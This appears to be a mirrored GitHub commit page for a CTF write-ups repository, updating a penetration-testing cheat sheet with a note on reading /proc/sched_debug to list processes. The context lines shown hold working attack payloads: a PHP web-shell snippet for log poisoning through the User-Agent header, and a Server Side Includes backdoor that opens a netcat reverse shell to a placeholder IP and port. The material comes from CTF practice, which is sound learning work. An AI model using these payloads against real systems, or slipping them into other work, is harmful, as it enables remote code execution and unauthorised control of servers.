Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-11-10 06:34:17 +00:00
Code Issues Projects Releases Packages Wiki Activity

Update Cheat Sheet.md

Browse source
This commit is contained in:
ARZ 2021-11-25 23:31:56 +05:00 committed by GitHub
parent 99b22aa13a
commit 32656dbd63
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

4
Cheat Sheet.md
View file

@ -544,6 +544,10 @@ For apache `/var/log/apache2/access.log` try to access the log and if we can the
For niginx `/var/log/nginx/error.log` try to access the log and if we can then add `<?php system($_GET['c']); ?>` in User-agent or try to add it in a file having a paramter make sure it's not being url encoded <br/> For niginx `/var/log/nginx/error.log` try to access the log and if we can then add `<?php system($_GET['c']); ?>` in User-agent or try to add it in a file having a paramter make sure it's not being url encoded <br/>
#### Proc
To see list of processes running on the system we can read this file `/proc/sched_debug`
### SSI (Server Side Includes) ### SSI (Server Side Includes)
` echo '<!--#exec cmd="nc -e /bin/bash IP PORT" -->' > backdoor.shtml` ` echo '<!--#exec cmd="nc -e /bin/bash IP PORT" -->' > backdoor.shtml`